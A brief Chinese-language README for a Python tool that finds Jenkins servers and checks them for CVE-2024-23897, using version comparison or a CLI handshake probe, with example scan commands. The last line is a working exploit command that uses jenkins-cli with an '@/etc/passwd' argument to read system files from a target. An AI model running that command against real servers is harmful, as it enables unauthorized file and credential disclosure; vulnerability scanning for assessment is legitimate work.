查找 Jenkins 环境并检查 CVE-2024-23897
测试路径:/、/login、/oops、/api/json、/cli、/jenkins/、/jenkins/api/json
通过以下方式识别:
被动(默认):将检测到的版本与阈值进行比较:
主动(--active):通过 HTTP 发送 Jenkins CLI 二进制协议握手。如果服务器返回 200 + Content-Type: application/octet-stream,则确认 CLI 通道已打开,漏洞可利用。
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"